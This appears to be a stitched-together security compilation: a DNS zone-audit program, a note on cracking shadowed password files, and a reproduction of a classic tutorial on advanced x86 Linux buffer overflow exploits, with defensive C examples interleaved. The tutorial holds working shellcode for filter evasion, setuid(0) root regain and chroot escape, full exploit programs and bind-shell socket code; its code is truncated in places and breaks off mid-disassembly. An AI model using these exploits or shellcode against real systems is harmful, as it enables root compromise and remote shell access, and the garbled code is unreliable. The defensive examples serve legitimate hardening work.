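As an added example (not the authors' tools or code), a check for the DNS exposure just described: given a zone as an outside party would receive it from an unrestricted zone transfer, it flags address records that point into private address space and records for hosts that are not on the list of intentionally public systems (the DNS server, mail gateway and Web site the text names). The zone text, host names and addresses are constructed.

```c
#include <stdio.h>
#include <string.h>

#define MAX_FINDINGS 32

/* True for RFC 1918 space (10/8, 172.16/12, 192.168/16); such addresses
   have no business in a zone served to the Internet at large. */
int is_private_ipv4(const char *ip)
{
    int a, b, c, d;
    if (sscanf(ip, "%d.%d.%d.%d", &a, &b, &c, &d) != 4) return 0;
    if (a == 10) return 1;
    if (a == 172 && b >= 16 && b <= 31) return 1;
    if (a == 192 && b == 168) return 1;
    return 0;
}

static int in_allowlist(const char *name, const char *const *allow, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (strcmp(name, allow[i]) == 0) return 1;
    return 0;
}

/* Walk a zone in the simple "name IN A rdata" form, one record per line.
   A records pointing into private space are reported as LEAK; A records
   for names not on the list of intended public hosts are reported as
   UNEXPECTED. Returns the number of findings written. */
size_t audit_zone(const char *zone, const char *const *allow, size_t nallow,
                  char findings[][80], size_t max_findings)
{
    size_t nf = 0;
    const char *p = zone;
    while (*p && nf < max_findings) {
        char line[256], name[64], cls[16], type[16], rdata[64];
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        p = nl ? nl + 1 : p + len;

        if (line[0] == ';' || line[0] == '$' || line[0] == '\0') continue;
        if (sscanf(line, "%63s %15s %15s %63s", name, cls, type, rdata) != 4) continue;
        if (strcmp(type, "A") != 0) continue;   /* only address records here */

        if (is_private_ipv4(rdata))
            snprintf(findings[nf++], 80, "LEAK: %s -> %s (internal address published)", name, rdata);
        else if (!in_allowlist(name, allow, nallow))
            snprintf(findings[nf++], 80, "UNEXPECTED: %s -> %s (not an intended public host)", name, rdata);
    }
    return nf;
}

/* Constructed zone, as an outsider might receive it over an unrestricted
   AXFR; hosts and addresses are invented for the example. */
static const char *sample_zone =
    "$ORIGIN example.com.\n"
    "; public-facing hosts\n"
    "ns1        IN A 198.51.100.2\n"
    "mail       IN A 198.51.100.20\n"
    "www        IN A 198.51.100.10\n"
    "www2       IN CNAME www\n"
    "; entries that should never have left the internal view\n"
    "intranet   IN A 10.1.2.3\n"
    "fileserver IN A 172.20.3.4\n"
    "hr-payroll IN A 198.51.100.33\n";

static const char *const public_hosts[] = { "ns1", "mail", "www" };

/* Run the audit over the constructed zone; returns the finding count. */
size_t audit_sample(char findings[][80], size_t max_findings)
{
    return audit_zone(sample_zone, public_hosts, 3, findings, max_findings);
}

int main(void)
{
    char findings[MAX_FINDINGS][80];
    size_t n = audit_sample(findings, MAX_FINDINGS);
    for (size_t i = 0; i < n; i++) puts(findings[i]);
    return 0;
}
```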
If we obtain "super-user" access, we run crack, a Unix-based password cracker, on the shadowed password file, in anticipation that these same logins and passwords also exist on other machines. We've found that crack does some rather extensive dictionary attacks on people's encrypted passwords and generally has a high rate of success. In some cases, the password file isn't even shadowed, and super-user access isn't required to get at the encrypted passwords.

@HWA

34.0 Advanced buffer overflow exploit Written by Taeho Oh
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Taeho Oh

-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------

Advanced buffer overflow exploit Written by Taeho Oh ( ohhara@postech.edu )

----------------------------------------------------------------------------
Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug
----------------------------------------------------------------------------

1. Introduction

Nowadays there are many buffer overflow exploit codes. The early buffer overflow exploit codes only spawned a shell ( executed /bin/sh ). However, nowadays some buffer overflow exploit codes have very nice features: for example, passing through filtering, opening a socket, breaking chroot, and so on. This paper will attempt to explain advanced buffer overflow exploit skills under intel x86 linux.

2. What do you have to know before reading?

You have to know assembly language, C language, and Linux. Of course, you have to know what a buffer overflow is. You can get information about buffer overflows in phrack 49-14 ( Smashing The Stack For Fun And Profit by Aleph1 ).
It is a wonderful paper of buffer overflow and I highly recommend you to read that before reading this one. 3. Pass through filtering There are many programs which has buffer overflow problems. Why are not the all buffer overflow problems exploited? Because even if a program has a buffer overflow condition, it can be hard to exploit. In many cases, the reason is that the program filters some characters or converts characters into other characters. If the program filters all non printable characters, it's too hard to exploit. If the program filters some of characters, you can pass through the filter by making good buffer overflow exploit code. :) 3.1 The example vulnerable program vulnerable1.c ---------------------------------------------------------------------------- #include #include int main(int argc,int **argv) { char buffer[1024]; int i; if(argc>1) { for(i=0;i #include #define ALIGN 0 #define OFFSET 0 #define RET_POSITION 1024 #define RANGE 20 #define NOP 0x90 char shellcode[]= "\xeb\x38" /* jmp 0x38 */ "\x5e" /* popl %esi */ "\x80\x46\x01\x50" /* addb $0x50,0x1(%esi) */ "\x80\x46\x02\x50" /* addb $0x50,0x2(%esi) */ "\x80\x46\x03\x50" /* addb $0x50,0x3(%esi) */ "\x80\x46\x05\x50" /* addb $0x50,0x5(%esi) */ "\x80\x46\x06\x50" /* addb $0x50,0x6(%esi) */ "\x89\xf0" /* movl %esi,%eax */ "\x83\xc0\x08" /* addl $0x8,%eax */ "\x89\x46\x08" /* movl %eax,0x8(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %eax,0x7(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* inc %eax */ "\xcd\x80" /* int $0x80 */ "\xe8\xc3\xff\xff\xff" /* call -0x3d */ "\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh" */ /* /bin/sh is disguised */ unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } main(int argc,char **argv) { 
char buff[RET_POSITION+RANGE+ALIGN+1],*ptr; long addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1; int i; if(argc>1) offset=atoi(argv[1]); sp=get_sp(); addr=sp-offset; for(i=0;i>8; buff[i+ALIGN+2]=(addr&0x00ff0000)>>16; buff[i+ALIGN+3]=(addr&0xff000000)>>24; } for(i=0;i #include int main(int argc,char **argv) { char buffer[1024]; seteuid(getuid()); if(argc>1) strcpy(buffer,argv[1]); } ---------------------------------------------------------------------------- This vulnerable program calls seteuid(getuid()) at start. Therefore, you may think that "strcpy(buffer,argv[1]);" is OK. Because you can only get your own shell although you succeed in buffer overflow attack. However, if you insert a code which calls setuid(0) in the shellcode, you can get root shell. :) 4.2 Make setuid(0) code setuidasm.c ---------------------------------------------------------------------------- main() { setuid(0); } ---------------------------------------------------------------------------- compile and disassemble ---------------------------------------------------------------------------- [ ohhara@ohhara ~ ] {1} $ gcc -o setuidasm -static setuidasm.c [ ohhara@ohhara ~ ] {2} $ gdb setuidasm GNU gdb 4.17 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... 
(gdb) disassemble setuid Dump of assembler code for function __setuid: 0x804ca00 <__setuid>: movl %ebx,%edx 0x804ca02 <__setuid+2>: movl 0x4(%esp,1),%ebx 0x804ca06 <__setuid+6>: movl $0x17,%eax 0x804ca0b <__setuid+11>: int $0x80 0x804ca0d <__setuid+13>: movl %edx,%ebx 0x804ca0f <__setuid+15>: cmpl $0xfffff001,%eax 0x804ca14 <__setuid+20>: jae 0x804cc10 <__syscall_error> 0x804ca1a <__setuid+26>: ret 0x804ca1b <__setuid+27>: nop 0x804ca1c <__setuid+28>: nop 0x804ca1d <__setuid+29>: nop 0x804ca1e <__setuid+30>: nop 0x804ca1f <__setuid+31>: nop End of assembler dump. (gdb) ---------------------------------------------------------------------------- setuid(0); code ---------------------------------------------------------------------------- char code[]= "\x31\xc0" /* xorl %eax,%eax */ "\x31\xdb" /* xorl %ebx,%ebx */ "\xb0\x17" /* movb $0x17,%al */ "\xcd\x80"; /* int $0x80 */ ---------------------------------------------------------------------------- 4.3 Modify the normal shellcode Making new shellcode is very easy if you make setuid(0) code. Just insert the code into the start of the normal shellcode. 
new shellcode ---------------------------------------------------------------------------- char shellcode[]= "\x31\xc0" /* xorl %eax,%eax */ "\x31\xdb" /* xorl %ebx,%ebx */ "\xb0\x17" /* movb $0x17,%al */ "\xcd\x80" /* int $0x80 */ "\xeb\x1f" /* jmp 0x1f */ "\x5e" /* popl %esi */ "\x89\x76\x08" /* movl %esi,0x8(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %eax,0x7(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* inc %eax */ "\xcd\x80" /* int $0x80 */ "\xe8\xdc\xff\xff\xff" /* call -0x24 */ "/bin/sh"; /* .string \"/bin/sh\" */ ---------------------------------------------------------------------------- 4.4 Exploit vulnerable2 program With this shellcode, you can make an exploit code easily. exploit2.c ---------------------------------------------------------------------------- #include #include #define ALIGN 0 #define OFFSET 0 #define RET_POSITION 1024 #define RANGE 20 #define NOP 0x90 char shellcode[]= "\x31\xc0" /* xorl %eax,%eax */ "\x31\xdb" /* xorl %ebx,%ebx */ "\xb0\x17" /* movb $0x17,%al */ "\xcd\x80" /* int $0x80 */ "\xeb\x1f" /* jmp 0x1f */ "\x5e" /* popl %esi */ "\x89\x76\x08" /* movl %esi,0x8(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %eax,0x7(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* inc %eax */ "\xcd\x80" /* int $0x80 */ "\xe8\xdc\xff\xff\xff" /* call -0x24 */ "/bin/sh"; /* .string \"/bin/sh\" */ unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc,char **argv) { char 
buff[RET_POSITION+RANGE+ALIGN+1],*ptr; long addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1; int i; if(argc>1) offset=atoi(argv[1]); sp=get_sp(); addr=sp-offset; for(i=0;i>8; buff[i+ALIGN+2]=(addr&0x00ff0000)>>16; buff[i+ALIGN+3]=(addr&0xff000000)>>24; } for(i=0;i #include int main(int argc,char **argv) { char buffer[1024]; chroot("/home/ftp"); chdir("/"); if(argc>1) strcpy(buffer,argv[1]); }
----------------------------------------------------------------------------
If you try to execute "/bin/sh" through the buffer overflow, it may execute "/home/ftp/bin/sh" ( if it exists ) and you cannot access any directory other than "/home/ftp".

5.2 Make break chroot code

If you can execute the code below, you can break chroot.

breakchrootasm.c
----------------------------------------------------------------------------
main() { mkdir("sh",0755); chroot("sh"); /* many "../" */ chroot("../../../../../../../../../../../../../../../../"); }
----------------------------------------------------------------------------
This break-chroot code makes an "sh" directory because it is easy to reference ( it is also used to execute "/bin/sh" ).

compile and disassemble
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o breakchrootasm -static breakchrootasm.c [ ohhara@ohhara ~ ] {2} $ gdb breakchrootasm GNU gdb 4.17 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"...
(gdb) disassemble mkdir Dump of assembler code for function __mkdir: 0x804cac0 <__mkdir>: movl %ebx,%edx 0x804cac2 <__mkdir+2>: movl 0x8(%esp,1),%ecx 0x804cac6 <__mkdir+6>: movl 0x4(%esp,1),%ebx 0x804caca <__mkdir+10>: movl $0x27,%eax 0x804cacf <__mkdir+15>: int $0x80 0x804cad1 <__mkdir+17>: movl %edx,%ebx 0x804cad3 <__mkdir+19>: cmpl $0xfffff001,%eax 0x804cad8 <__mkdir+24>: jae 0x804cc40 <__syscall_error> 0x804cade <__mkdir+30>: ret 0x804cadf <__mkdir+31>: nop End of assembler dump. (gdb) disassemble chroot Dump of assembler code for function chroot: 0x804cb60 : movl %ebx,%edx 0x804cb62 : movl 0x4(%esp,1),%ebx 0x804cb66 : movl $0x3d,%eax 0x804cb6b : int $0x80 0x804cb6d : movl %edx,%ebx 0x804cb6f : cmpl $0xfffff001,%eax 0x804cb74 : jae 0x804cc40 <__syscall_error> 0x804cb7a : ret 0x804cb7b : nop 0x804cb7c : nop 0x804cb7d : nop 0x804cb7e : nop 0x804cb7f : nop End of assembler dump. (gdb) ---------------------------------------------------------------------------- mkdir("sh",0755); code ---------------------------------------------------------------------------- /* mkdir first argument is %ebx and second argument is */ /* %ecx. */ char code[]= "\x31\xc0" /* xorl %eax,%eax */ "\x31\xc9" /* xorl %ecx,%ecx */ "\xb0\x17" /* movb $0x27,%al */ "\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */ /* %esi has to reference "/bin/sh" before using this */ /* instruction. 
This instruction load address of "sh" */ /* and store at %ebx */ "\xfe\xc5" /* incb %ch */ /* %cx = 0000 0001 0000 0000 */ "\xb0\x3d" /* movb $0xed,%cl */ /* %cx = 0000 0001 1110 1101 */ /* %cx = 000 111 101 101 */ /* %cx = 0 7 5 5 */ "\xcd\x80"; /* int $0x80 */ ---------------------------------------------------------------------------- chroot("sh"); code ---------------------------------------------------------------------------- /* chroot first argument is ebx */ char code[]= "\x31\xc0" /* xorl %eax,%eax */ "\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */ "\xb0\x3d" /* movb $0x3d,%al */ "\xcd\x80"; /* int $0x80 */ ---------------------------------------------------------------------------- chroot("../../../../../../../../../../../../../../../../"); code ---------------------------------------------------------------------------- char code[]= "\xbb\xd2\xd1\xd0\xff" /* movl $0xffd0d1d2,%ebx */ /* disguised "../" character string */ "\xf7\xdb" /* negl %ebx */ /* %ebx = $0x002f2e2e */ /* intel x86 is little endian. */ /* %ebx = "../" */ "\x31\xc9" /* xorl %ecx,%ecx */ "\xb1\x10" /* movb $0x10,%cl */ /* prepare for looping 16 times. */ "\x56" /* pushl %esi */ /* backup current %esi. %esi has the pointer of */ /* "/bin/sh". */ "\x01\xce" /* addl %ecx,%esi */ "\x89\x1e" /* movl %ebx,(%esi) */ "\x83\xc6\x03" /* addl $0x3,%esi */ "\xe0\xf9" /* loopne -0x7 */ /* make "../../../../ . . . " character string at */ /* 0x10(%esi) by looping. */ "\x5e" /* popl %esi */ /* restore %esi. */ "\xb0\x3d" /* movb $0x3d,%al */ "\x8d\x5e\x10" /* leal 0x10(%esi),%ebx */ /* %ebx has the address of "../../../../ . . . ". */ "\xcd\x80"; /* int $0x80 */ ---------------------------------------------------------------------------- 5.3 Modify the normal shellcode Making new shellcode is very easy if you make break chroot code. Just insert the code into the start of the normal shellcode and modify jmp and call argument. 
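For the defender's side of sections 4 and 5, an added example that is not part of Taeho Oh's paper: a bounded replacement for the strcpy in the vulnerable programs, a privilege drop that also sets the saved set-user-ID (so the setuid(0) prefix of section 4 has nothing to restore), and a chroot entry that gives up root before doing any work, which removes what the mkdir/chroot/chroot("../..") escape of section 5 depends on. The function names are assumptions, and Linux with glibc is assumed for setresuid().

```c
#define _GNU_SOURCE          /* for setresuid() on glibc */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Prototype repeated in case the feature macro was not seen before the
   first header was included (harmless when unistd.h already declares it). */
int setresuid(uid_t ruid, uid_t euid, uid_t suid);

#define BUF_SIZE 1024

/* Bounded replacement for the unchecked strcpy(buffer, argv[1]) in the
   vulnerable programs above. Refuses input that would not fit together
   with its terminating NUL, so the saved return address is never reached.
   Returns 0 on success, -1 when the input is rejected. */
int copy_arg(char *dst, size_t dst_size, const char *src)
{
    size_t n = strnlen(src, dst_size);   /* never reads past dst_size */
    if (n >= dst_size) return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Permanent privilege drop. vulnerable2.c calls seteuid(getuid()), which
   changes only the effective uid and leaves the saved set-user-ID at 0;
   that is exactly why the setuid(0) prefix in section 4 works. Setting
   real, effective and saved uid together closes that door. After the
   drop the function checks that root cannot be regained.
   Returns 0 on success, -1 if the drop failed or could be undone. */
int drop_privileges_permanently(uid_t uid)
{
    if (setresuid(uid, uid, uid) != 0) return -1;
    if (uid != 0 && setuid(0) == 0) return -1;   /* must now fail with EPERM */
    return 0;
}

/* Jail entry in the order that defeats section 5's escape: chroot/chdir,
   then a permanent drop to an unprivileged uid. The mkdir("sh") +
   chroot("sh") + chroot("../../..") sequence needs the process to still be
   root inside the jail; an unprivileged process cannot call chroot() at
   all. Entering the jail itself requires root. */
int enter_jail(const char *dir, uid_t unprivileged_uid)
{
    if (unprivileged_uid == 0) return -1;        /* a root jail is no jail */
    if (chroot(dir) != 0 || chdir("/") != 0) return -1;
    return drop_privileges_permanently(unprivileged_uid);
}

/* Hardened counterpart of vulnerable1.c: same shape, but the copy is
   bounded and an overlong argument is rejected instead of overwriting
   the stack. Returns 0 when the argument was accepted. */
int handle_argument(const char *arg)
{
    char buffer[BUF_SIZE];
    if (copy_arg(buffer, sizeof buffer, arg) != 0) return -1;
    return 0;
}

int main(int argc, char **argv)
{
    if (drop_privileges_permanently(getuid()) != 0) return 1;
    if (argc > 1 && handle_argument(argv[1]) != 0) {
        fprintf(stderr, "argument too long (limit %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    return 0;
}
```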
new shellcode ---------------------------------------------------------------------------- char shellcode[]= "\xeb\x4f" /* jmp 0x4f */ "\x31\xc0" /* xorl %eax,%eax */ "\x31\xc9" /* xorl %ecx,%ecx */ "\x5e" /* popl %esi */ "\x88\x46\x07" /* movb %al,0x7(%esi) */ "\xb0\x27" /* movb $0x27,%al */ "\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */ "\xfe\xc5" /* incb %ch */ "\xb1\xed" /* movb $0xed,%cl */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */ "\xb0\x3d" /* movb $0x3d,%al */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\xbb\xd2\xd1\xd0\xff" /* movl $0xffd0d1d2,%ebx */ "\xf7\xdb" /* negl %ebx */ "\x31\xc9" /* xorl %ecx,%ecx */ "\xb1\x10" /* movb $0x10,%cl */ "\x56" /* pushl %esi */ "\x01\xce" /* addl %ecx,%esi */ "\x89\x1e" /* movl %ebx,(%esi) */ "\x83\xc6\x03" /* addl %0x3,%esi */ "\xe0\xf9" /* loopne -0x7 */ "\x5e" /* popl %esi */ "\xb0\x3d" /* movb $0x3d,%al */ "\x8d\x5e\x10" /* leal 0x10(%esi),%ebx */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\x89\x76\x08" /* movl %esi,0x8(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\xe8\xac\xff\xff\xff" /* call -0x54 */ "/bin/sh"; /* .string \"/bin/sh\" */ ---------------------------------------------------------------------------- 5.4 Exploit vulnerable3 program With this shellcode, you can make an exploit code easily. 
exploit3.c
----------------------------------------------------------------------------
#include
#include

#define ALIGN                   0
#define OFFSET                  0
#define RET_POSITION            1024
#define RANGE                   20
#define NOP                     0x90

char shellcode[]=
  "\xeb\x4f"                  /* jmp 0x4f */
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\x31\xc9"                  /* xorl %ecx,%ecx */
  "\x5e"                      /* popl %esi */
  "\x88\x46\x07"              /* movb %al,0x7(%esi) */
  "\xb0\x27"                  /* movb $0x27,%al */
  "\x8d\x5e\x05"              /* leal 0x5(%esi),%ebx */
  "\xfe\xc5"                  /* incb %ch */
  "\xb1\xed"                  /* movb $0xed,%cl */
  "\xcd\x80"                  /* int $0x80 */
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\x8d\x5e\x05"              /* leal 0x5(%esi),%ebx */
  "\xb0\x3d"                  /* movb $0x3d,%al */
  "\xcd\x80"                  /* int $0x80 */
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\xbb\xd2\xd1\xd0\xff"      /* movl $0xffd0d1d2,%ebx */
  "\xf7\xdb"                  /* negl %ebx */
  "\x31\xc9"                  /* xorl %ecx,%ecx */
  "\xb1\x10"                  /* movb $0x10,%cl */
  "\x56"                      /* pushl %esi */
  "\x01\xce"                  /* addl %ecx,%esi */
  "\x89\x1e"                  /* movl %ebx,(%esi) */
  "\x83\xc6\x03"              /* addl $0x3,%esi */
  "\xe0\xf9"                  /* loopne -0x7 */
  "\x5e"                      /* popl %esi */
  "\xb0\x3d"                  /* movb $0x3d,%al */
  "\x8d\x5e\x10"              /* leal 0x10(%esi),%ebx */
  "\xcd\x80"                  /* int $0x80 */
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\x89\x76\x08"              /* movl %esi,0x8(%esi) */
  "\x89\x46\x0c"              /* movl %eax,0xc(%esi) */
  "\xb0\x0b"                  /* movb $0xb,%al */
  "\x89\xf3"                  /* movl %esi,%ebx */
  "\x8d\x4e\x08"              /* leal 0x8(%esi),%ecx */
  "\x8d\x56\x0c"              /* leal 0xc(%esi),%edx */
  "\xcd\x80"                  /* int $0x80 */
  "\xe8\xac\xff\xff\xff"      /* call -0x54 */
  "/bin/sh";                  /* .string \"/bin/sh\" */

unsigned long get_sp(void)
{
  __asm__("movl %esp,%eax");
}

void main(int argc,char **argv)
{
  char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
  long addr;
  unsigned long sp;
  int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
  int i;

  if(argc>1)
    offset=atoi(argv[1]);

  sp=get_sp();
  addr=sp-offset;

  for(i=0;i>8;
    buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
    buff[i+ALIGN+3]=(addr&0xff000000)>>24;
  }

  for(i=0;i
int main(int argc,char **argv)
{
  char buffer[1024];

  if(argc>1)
    strcpy(buffer,argv[1]);
}
----------------------------------------------------------------------------
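The vulnerable program just shown (the page calls it vulnerable4) copies argv[1] into a 1024-byte stack buffer with strcpy and no length check, which is the whole reason the exploit buffers in this article (a run of NOP 0x90 bytes, the shellcode, then the overwritten return address) work. The following is an added example, not code from the article, showing the two things a defender would change: a bounds-checked replacement for that strcpy that rejects rather than silently truncates, and the kind of payload-shape check an input filter or IDS applies to an argument or packet, a NOP sled followed by int $0x80 (0xcd 0x80) bytes. The function names, the sled threshold and the sample inputs in the test are constructed for this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUFSZ 1024   /* same buffer size as the vulnerable program */

/* Hardened counterpart of strcpy(buffer, argv[1]): reads at most dstsz
 * bytes of src and refuses input that does not fit together with its
 * terminator. Returns the number of bytes copied, or -1 when rejected. */
long copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = strnlen(src, dstsz);   /* never scans past dstsz bytes        */
    if (n >= dstsz)                   /* no room for the NUL: reject, do not */
        return -1;                    /* truncate and carry on               */
    memcpy(dst, src, n + 1);
    return (long)n;
}

/* Shape check for an argument or packet: the exploit buffers in this
 * article are a long run of 0x90 followed by code that traps into the
 * kernel with int $0x80 (0xcd 0x80). Returns 1 when buf contains a NOP
 * run of at least min_sled bytes with an int $0x80 somewhere after it,
 * otherwise 0. The threshold is a constructed value; a real detector
 * tunes it per protocol and pairs it with other indicators. */
int looks_like_x86_payload(const unsigned char *buf, size_t n, size_t min_sled)
{
    size_t run = 0, sled_end = 0;
    int have_sled = 0;
    for (size_t i = 0; i < n; i++) {
        if (buf[i] == 0x90) {
            if (++run >= min_sled) { have_sled = 1; sled_end = i; }
        } else {
            run = 0;
        }
    }
    if (!have_sled)
        return 0;
    for (size_t i = sled_end + 1; i + 1 < n; i++)
        if (buf[i] == 0xcd && buf[i + 1] == 0x80)
            return 1;
    return 0;
}

/* Drop-in for the vulnerable main(): same input, no overflow.
 * Returns 0 when the argument was accepted, 1 or 2 when rejected. */
int handle_argument(const char *arg)
{
    char buffer[BUFSZ];
    if (looks_like_x86_payload((const unsigned char *)arg, strlen(arg), 32)) {
        fprintf(stderr, "rejected: input looks like an x86 payload\n");
        return 2;
    }
    if (copy_bounded(buffer, sizeof buffer, arg) < 0) {
        fprintf(stderr, "rejected: input longer than %d bytes\n", BUFSZ - 1);
        return 1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    return argc > 1 ? handle_argument(argv[1]) : 0;
}
```

The length check alone removes the overflow; the shape check is there because the same daemon is about to be fed the socket-opening payload of the next section over the network, and a NOP sled plus syscall trap in an argument or request is something worth logging even when the copy is already safe.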

This is the standard vulnerable program. I will use it for the socket-opening
buffer overflow, because I am too lazy to write an example daemon program. :)
However, once you see the code, you will not be disappointed.

6.2 Make open socket code

If you can execute the code below, you can open a socket.

opensocketasm1.c
----------------------------------------------------------------------------
#include
#include
#include

int soc,cli,soc_len;
struct sockaddr_in serv_addr;
struct sockaddr_in cli_addr;

int main()
{
  if(fork()==0)
  {
    serv_addr.sin_family=AF_INET;
    serv_addr.sin_addr.s_addr=htonl(INADDR_ANY);
    serv_addr.sin_port=htons(30464);
    soc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    bind(soc,(struct sockaddr *)&serv_addr,sizeof(serv_addr));
    listen(soc,1);
    soc_len=sizeof(cli_addr);
    cli=accept(soc,(struct sockaddr *)&cli_addr,&soc_len);
    dup2(cli,0);
    dup2(cli,1);
    dup2(cli,2);
    execl("/bin/sh","sh",0);
  }
}
----------------------------------------------------------------------------

This is awkward to write in assembly language as it stands, but the program
can be simplified:

opensocketasm2.c
----------------------------------------------------------------------------
#include
#include
#include

int soc,cli;
struct sockaddr_in serv_addr;

int main()
{
  if(fork()==0)
  {
    serv_addr.sin_family=2;
    serv_addr.sin_addr.s_addr=0;
    serv_addr.sin_port=0x77;
    soc=socket(2,1,6);
    bind(soc,(struct sockaddr *)&serv_addr,0x10);
    listen(soc,1);
    cli=accept(soc,0,0);
    dup2(cli,0);
    dup2(cli,1);
    dup2(cli,2);
    execl("/bin/sh","sh",0);
  }
}
----------------------------------------------------------------------------

compile and disassemble
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o opensocketasm2 -static opensocketasm2.c
[ ohhara@ohhara ~ ] {2} $ gdb opensocketasm2
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disassemble fork
Dump of assembler code for function fork:
0x804ca90 :     movl   $0x2,%eax
0x804ca95 :     int    $0x80
0x804ca97 :     cmpl   $0xfffff001,%eax
0x804ca9c :     jae    0x804cdc0 <__syscall_error>
0x804caa2 :     ret
0x804caa3 :     nop
0x804caa4 :     nop
0x804caa5 :     nop
0x804caa6 :     nop
0x804caa7 :     nop
0x804caa8 :     nop
0x804caa9 :     nop
0x804caaa :     nop
0x804caab :     nop
0x804caac :     nop
0x804caad :     nop
0x804caae :     nop
0x804caaf :     nop
End of assembler dump.
(gdb) disassemble socket
Dump of assembler code for function socket:
0x804cda0 :     movl   %ebx,%edx
0x804cda2 :     movl   $0x66,%eax
0x804cda7 :     movl   $0x1,%ebx
0x804cdac :     leal   0x4(%esp,1),%ecx
0x804cdb0 :     int    $0x80
0x804cdb2 :     movl   %edx,%ebx
0x804cdb4 :     cmpl   $0xffffff83,%eax
0x804cdb7 :     jae    0x804cdc0 <__syscall_error>
0x804cdbd :     ret
0x804cdbe :     nop
0x804cdbf :     nop
End of assembler dump.
(gdb) disassemble bind
Dump of assembler code for function bind:
0x804cd60 :     movl   %ebx,%edx
0x804cd62 :     movl   $0x66,%eax
0x804cd67 :     movl   $0x2,%ebx
0x804cd6c :     leal   0x4(%esp,1),%ecx
0x804cd70 :     int    $0x80
0x804cd72 :     movl   %edx,%ebx
0x804cd74 :     cmpl   $0xffffff83,%eax
0x804cd77 :     jae    0x804cdc0 <__syscall_error>
0x804cd7d :     ret
0x804cd7e :     nop
0x804cd7f :     nop
End of assembler dump.
(gdb) disassemble listen
Dump of assembler code for function listen:
